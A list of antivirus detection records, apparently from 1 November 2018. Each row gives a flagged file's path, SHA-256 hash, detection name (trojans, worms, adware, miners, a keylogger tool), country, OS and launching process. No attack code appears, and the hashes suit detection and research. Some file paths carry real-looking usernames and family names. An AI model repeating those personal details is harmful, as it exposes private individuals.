  Row(detection=Row(filename='dwhf21e.exe', filepath='C:\\ProgramData\\Symantec\\DefWatch.DWH\\DWHF21E.exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline='\\\\\\/s \\\\\\"Symantec Endpoint Protection\\\\\\" \\\\\\/m \\\\\\"C:\\\\\\\\Program Files\\\\\\\\Symantec\\\\\\\\Symantec Endpoint Protection\\\\\\\\12.1.4100.4126.105\\\\\\\\Bin\\\\\\\\sms.dll\\\\\\" \\\\\\/prefetch:1', country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Symantec\\Symantec Endpoint Protection\\12.1.4100.4126.105\\Bin\\ccSvcHst.exe', parentsize=144496, timestamp='2018-11-01T09:31:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ata emsa .scr', filepath='C:\\Users\\X\\Desktop\\ATA EMSA .scr', filesize=320000, name='WORM/Nenebra.A.#M1.#R1'), hash='53a514f013d76540f5daf64de34a640b8a214a9af019a5c257fd562ca7d50ee5', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T16:46:36Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dwheff8.exe', filepath='C:\\ProgramData\\Symantec\\DefWatch.DWH\\DWHEFF8.exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline='\\\\\\/s \\\\\\"Symantec Endpoint Protection\\\\\\" \\\\\\/m \\\\\\"C:\\\\\\\\Program Files\\\\\\\\Symantec\\\\\\\\Symantec Endpoint Protection\\\\\\\\12.1.4100.4126.105\\\\\\\\Bin\\\\\\\\sms.dll\\\\\\" \\\\\\/prefetch:1', country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Symantec\\Symantec Endpoint Protection\\12.1.4100.4126.105\\Bin\\ccSvcHst.exe', parentsize=144496, timestamp='2018-11-01T09:40:31Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155251-a2062150', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-155251-A2062150', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:52:52Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-154948-833172d6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-154948-833172D6', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:49:49Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='downloader-fuer-nokiasoftwareupdatersetup_de.exe', filepath='F:\\Downloads\\blaah#\\Downloader-fuer-NokiaSoftwareUpdaterSetup_de.exe', filesize=512000, name='PUA/DownloadSponsor.Gen.#M300.#R5738'), hash='445f7a3bd3b5611edb93888be49641fd4c6c02d9f9e2b90bb6c761f773ab4a3a', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\BullGuard Ltd\\BullGuard\\BullGuardScanner.exe', parentsize=324376, timestamp='2018-11-01T19:14:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='aidl.exe', filepath='D:\\china\\tecno\\L\\5\\Tecno_L5_MT6580_20151007\\MTK\\SN Write Tool v2.1504.00\\Android\\aidl.exe', filesize=1472000, name='W32/Sality.AT.#M1.#R1'), hash='43730ac7c922e8e5188c0f5b7a6619900beb206abaeb41614561e3cd63b1194d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='D:\\china\\HUAWEI_Y336-U02_Firmware_V100R001C328B109_05021UAY_Sri Lanka\\Software\\Y336-U02V100R001C328B109\\Software\\Upgtade tools&drivers\\ResearchDownload_2.9.9016\\Bin\\ResearchDownload.exe', parentsize=1687552, timestamp='2018-11-01T14:48:09Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='neditor.exe', filepath='\\\\?\\C:\\NIKAN_SOFT\\DIC2\\Narcis Soft\\Dictionary\\NEditor.exe', filesize=512000, name='TR/Patched.Gen.#M300.#R3367'), hash='7a7d3337b058cbbf18b7d6583c2f985ba323eb175633b276d2180787258546a0', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:53:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-120638-7bc67d96', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-120606-61018944\\AVSCAN-20181101-120638-7BC67D96', filesize=20000, name='PUA/Linkury.Gen2.#M300.#R101296'), hash='9d728e799087184abed77f070f3fdee4fd9fae622bf93bcfa4744be9dfaf89e9', metadata=Row(cmdline=None, country='ES', os_name='Windows', os_vmajor='6', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T11:06:38Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='bfffddfbddbbffdbdbfdddbfdbddbfbbddbbbfbffdbbbbddbddbf.bfffddfbddbbffdbdbfdddbfdbddbfbbddbbbfbffdbbbbddbddbf', filepath='G:\\\xa0\\data0\\data0\\data0\\data0\\data0\\data0\\data0\\data0\\data0\\bfffddfbddbbffdbdbfdddbfdbddbfbbddbbbfbffdbbbbddbddbf.bfffddfbddbbffdbdbfdddbfdbddbfbbddbbbfbffdbbbbddbddbf', filesize=5952000, name='WORM/Lodbak.Gen.#M2.#R7758'), hash='eae2ce948d7bcfc7a25cf45c3e4439425a1b245a0ed49da7bce1ece882291183', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T08:17:32Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='видео.exe', filepath='D:\\Видео\\Видео.exe', filesize=512000, name='TR/Chydo.TF.#M1.#R1'), hash='e3460c24a1aa8b9a9694490074b672fd95f10e62f5467b2503cfb7fcd43e73da', metadata=Row(cmdline=None, country='KZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:28:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='~6a3aed0e.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~6a3aed0e.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='a945807b163eb02475abfc4d31f3fbba141e665868c164f047895c7aa9af58f3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-01T12:00:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='newbxd1oe6g.htm', filepath='C:\\Windows.old\\Users\\CP\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\QP7KC6GJ\\newBXD1OE6G.htm', filesize=248000, name='VBS/Ramnit.abcd.#M1.#R1'), hash='e2c25e5a6c1b1e4f5b34b78eb27722ecfd6bf76957dc54437765869c3e29427d', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe', parentsize=818784, timestamp='2018-11-01T17:37:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yahoo! powered tocol', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered tocol', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='c2c74d5724abbb8c4ce1b9b54093850b48820c8d39869f0434e8240d24009071', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T12:33:55Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='music.scr', filepath='C:\\Users\\X\\Music\\Music.scr', filesize=512000, name='TR/Taranis.2886.#M1.#R1'), hash='5d7619a3ea0a69ca84d26878d6cc2d60a93f9b95f23d937c064d5ba9043b9405', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:57:40Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='b679adc73537cac493714a2bc863442581f7031eb7819e044825f7bc60dea86f', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-33\\B679ADC73537CAC493714A2BC863442581F7031EB7819E044825F7BC60DEA86F', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='b679adc73537cac493714a2bc863442581f7031eb7819e044825f7bc60dea86f', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:29:17Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-192719-7fefb159', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c9a063d9\\AVSCAN-20181031-205810-8E73B4A7\\AVSCAN-20181101-192719-7FEFB159', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='b0f573ea98c9bf9031b213bccd148d898b39d3a775ada9f2349f0861aecc82c3', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T18:34:48Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yahoo! powered tocol', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered tocol', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='c2c74d5724abbb8c4ce1b9b54093850b48820c8d39869f0434e8240d24009071', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T22:33:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-110945-f15b4d1d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-110945-F15B4D1D', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T17:09:30Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='a0008308.exe', filepath='E:\\System Volume Information\\_restore{75C7AE52-D1AC-46D0-8315-28C9EF83A0B2}\\RP8\\A0008308.exe', filesize=192000, name='HEUR/APC.#M1.#R1'), hash='6c965e11d644c1387b55706257b4bf8359601324a56681f7e0fa61b91e5f5cf7', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T17:52:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-141259-ea014068', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_103c7217\\AVSCAN-20181101-141146-DA744C4C\\AVSCAN-20181101-141259-EA014068', filesize=376000, name='PUA/MyWebSearch.ME.1.#M300.#R6777'), hash='a36c690c41d2651fe6a2e5f9d785ac213521e3b62107bb5a7b6b4ee4372a5b75', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T13:13:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181031-234903-9a72aea0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b469cc29\\AVSCAN-20181031-234849-97AD99F6\\AVSCAN-20181031-234903-9A72AEA0', filesize=7936000, name='TR/Crypt.TPM.Gen.#M1.#R1'), hash='77c91e39fd62c026c8a45d51bc5f65370b38bc1bffc700fae82bada75dbcfba6', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T04:49:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='keac.exe', filepath='C:\\Users\\X\\AppData\\Roaming\\Koyc\\keac.exe', filesize=320000, name='HEUR/AGEN.1002500.#M1.#R1'), hash='5f37114740b39c7aeb1555352790fb9bbedfe4fb7a9127edebd1600ac7703f0d', metadata=Row(cmdline='\\\\\\/scan \\\\\\/cleanclose', country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Spybot - Search & Destroy 2\\SDScan.exe', parentsize=7651984, timestamp='2018-11-01T14:24:14Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='playzth.exe', filepath='C:\\Program Files (x86)\\PlayZTH\\PlayZTH.exe', filesize=9664000, name='HEUR/AGEN.1027942.#M1.#R1'), hash='9eb401544bfbd608b71acb6d99c2b17edcc27d0bebea3b8149a2b407e6d91af3', metadata=Row(cmdline='--engine=2 --session-id=9oTkzHBP\\\\\\/iHMDRKmaVLqreP3itEqTW159F7GOv3S --registry-suffix=ESET --extended-safebrowsing-enabled --chrome-version=70.0.3538.77 --chrome-channel=4 --enable-crash-reporting', country='TH', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Users\\X\\AppData\\Local\\Google\\Chrome\\User Data\\SwReporter\\33.170.201\\software_reporter_tool.exe', parentsize=13810296, timestamp='2018-11-01T14:44:44Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tzpefjw.vgv', filepath='C:\\Windows\\System32\\tzpefjw.vgv', filesize=164000, name='WORM/Kido.ih.13.#M1.#R1'), hash='90d555ee3df33bc5ee2139af99567c0c694f11ffc007ef87250e4beabb6c6f1b', metadata=Row(cmdline='tzpefjw.vgv,ehfgzmy', country='AR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-01T14:59:48Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='new player.exe', filepath='H:\\Users\\X\\Downloads\\New player.exe', filesize=320000, name='PUA/DomaIQ.Gen.#M300.#R5220'), hash='d31881cdc789f00e315ece2156c3fccd20869901c80285c9fd569b628fff8799', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-01T14:26:14Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='faixa 10 lançamento 2015 -=mp3=- - copy (10).exe', filepath='C:\\Users\\X\\Documents\\Baixar,_Escutar_CD_Sorriso_Maroto_-_Eu_Gosto,_Ao_Vivo_No_Maracanãzinho_-_(2015)[1]\\Baixar, Escutar CD Sorriso Maroto - Eu Gosto, Ao Vivo No Maracanãzinho - (2015)\\FAIXA 10 Lançamento 2015 -=Mp3=- - Copy (10).exe', filesize=4800000, name='TR/Spy.Banker.Gen.#M300.#R2024'), hash='6a10f4e287d21dd6ef83dd4c4fe2a109922634b96f93274f2c2bdbcbd68ebea7', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\explorer.exe', parentsize=2755504, timestamp='2018-11-01T03:19:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-110322-c10c2a32', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-110322-C10C2A32', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T17:03:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='miner.exe', filepath='\\\\?\\C:\\Zec Miner 0.3.4b\\0.3.4b\\miner.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T18:45:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='a0125996.exe', filepath='\\?\\H:\\System Volume Information\\_restore{FD8CA95C-615B-4BD2-B142-4564B27DDB35}\\RP2\\A0125996.EXE', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='08f001bff3c666a6f70c117695c9e6c1d7d58659e5e5c351f6c7ca204eca8718', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T22:43:46Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yamgeneric001.exe', filepath='\\\\?\\C:\\Windows\\yamgeneric001.exe', filesize=3840000, name='SPR/BitCoin.R.17.#M1.#R1'), hash='123ddc718d5557233de61371644f83948c59c12e897ff58dec883c64e22aaf3b', metadata=Row(cmdline=None, country='RO', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T15:26:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ioc84d42fbd-ea4b-f744-a51c-692c15ae70d2.exe', filepath='C:\\programdata\\kaspersky lab\\avp18.0.0\\temp\\ioc84D42FBD-EA4B-F744-A51C-692C15AE70D2.exe', filesize=16416000, name='TR/Patched.Ren.Gen.#M300.#R4405'), hash='153672a8a39883d8fb5baf76454c9145ca648f8b6f3b8d32afe39dd96807095d', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\AVAST Software\\Avast\\AvastSvc.exe', parentsize=325024, timestamp='2018-11-01T13:00:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-053443-26f8f841', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8b7397db\\AVSCAN-20181102-001743-196A0AE8\\AVSCAN-20181102-053443-26F8F841', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='578d39ad2094181562e84cc0f0ef7a99aef1f27a5e537651d45dee406006b474', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T22:34:50Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-220502-b2263c75', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3120a23c\\AVSCAN-20181101-220442-AF82C187\\AVSCAN-20181101-220502-B2263C75', filesize=128000, name='HEUR/APC.#M1.#R1'), hash='6f9ed129dec26d3e6f56011f04baa2133e1a2b8bf6adcaac5361a25424c33a73', metadata=Row(cmdline=None, country='GB', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T22:05:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-224920-c22bbdb2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9aa61a38\\AVSCAN-20181101-222056-C791BC3B\\AVSCAN-20181101-224920-C22BBDB2', filesize=8932000, name='TR/Decep.PCfighter.6547.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:29:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='fph_prec.dll', filepath='C:\\CYPE Ingenieros\\Versión 2012\\programas\\fph_prec.dll', filesize=152000, name='W32/Ramnit.C.#M1.#R1'), hash='1378f427e8f97a775d5a15d5322d61b7c9590a21f05da06ca7581ed840c42425', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='AR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-01T12:31:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-205924-9d4e3c41', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_07927b3d\\AVSCAN-20181101-205913-9B2F58D1\\AVSCAN-20181101-205924-9D4E3C41', filesize=8932000, name='TR/Decep.PCfighter.6547.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T12:59:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msimg32.dll', filepath='c:\\users\\X\\downloads\\setup\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T23:19:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='wmplayer.exe', filepath='\\\\?\\C:\\Program Files\\Windows Media Player\\wmplayer.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='0d51c1bc7e916620e3b9c57f468cb2c84f00281324540ac636b8d8636adc3383', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:02:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='8544.exe', filepath='\\\\?\\C:\\Program Files (x86)\\Name\\8544.exe', filesize=1024000, name='Adware/CsdiMonetize.vgssx.#M1.#R1'), hash='2ca558499e6b9e872f4efe36145d1a52668b8e36f4eccad678575dad8d594f64', metadata=Row(cmdline=None, country='PG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T04:02:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-184014-8854d68a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0ad6231e\\AVSCAN-20181101-183515-71C35F13\\AVSCAN-20181101-184014-8854D68A', filesize=1024000, name='Adware/CsdiMonetize.vgssx.#M1.#R1'), hash='2ca558499e6b9e872f4efe36145d1a52668b8e36f4eccad678575dad8d594f64', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T21:40:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-002227-3847801d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8b7397db\\AVSCAN-20181102-002012-29AB3F0F\\AVSCAN-20181102-002227-3847801D', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='578d39ad2094181562e84cc0f0ef7a99aef1f27a5e537651d45dee406006b474', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:22:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ok多開器.exe', filepath='C:\\Users\\X\\Desktop\\1346\\OK多開器.exe', filesize=1536000, name='HEUR/APC.#M1.#R1'), hash='4f09d0c99c1241993cd2f55c1045c9f568fc62b446c454e0a19e83ce69ed1f4b', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\Desktop\\1346\\OK多開器.exe', parentsize=1536000, timestamp='2018-11-01T00:11:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-190816-e36c08f1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d3a1816b\\AVSCAN-20181101-190153-ABCB82F0\\AVSCAN-20181101-190816-E36C08F1', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T18:08:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T16:25:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='wap.exe', filepath='c:\\program files (x86)\\prokaward\\wap.exe', filesize=4096000, name='SPR/Tool.AwardKeylogger.93.#M1.#R1'), hash='6b0c812488381b7c768741c139ab6bbca0ac260d6775cd552e354bf93925224f', metadata=Row(cmdline=None, country='IL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\ProKAward\\rsasws.exe', parentsize=98304, timestamp='2018-11-01T14:37:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-205613-c9a4aa90', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_77273961\\AVSCAN-20181101-205534-C42517FF\\AVSCAN-20181101-205613-C9A4AA90', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T19:56:16Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tmp000b2b28', filepath='C:\\Windows\\Temp\\tmp00000296\\tmp000b2b28', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-01T10:53:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-175420-cd0662f2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_29d67868\\AVSCAN-20181101-171852-E21F9068\\AVSCAN-20181101-175420-CD0662F2', filesize=8932000, name='TR/Decep.PCfighter.6547.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T16:54:25Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup_winthruster_2016.exe', filepath='L:\\FAMILY\\2-DETWILER\\aug sept\\DWAYNE  ANN DETWILER\\Dwayne jr\\Holly\\Setup_WinThruster_2016.exe', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-01T18:50:21Z'), dt=datetime.date(2018, 11, 1)),
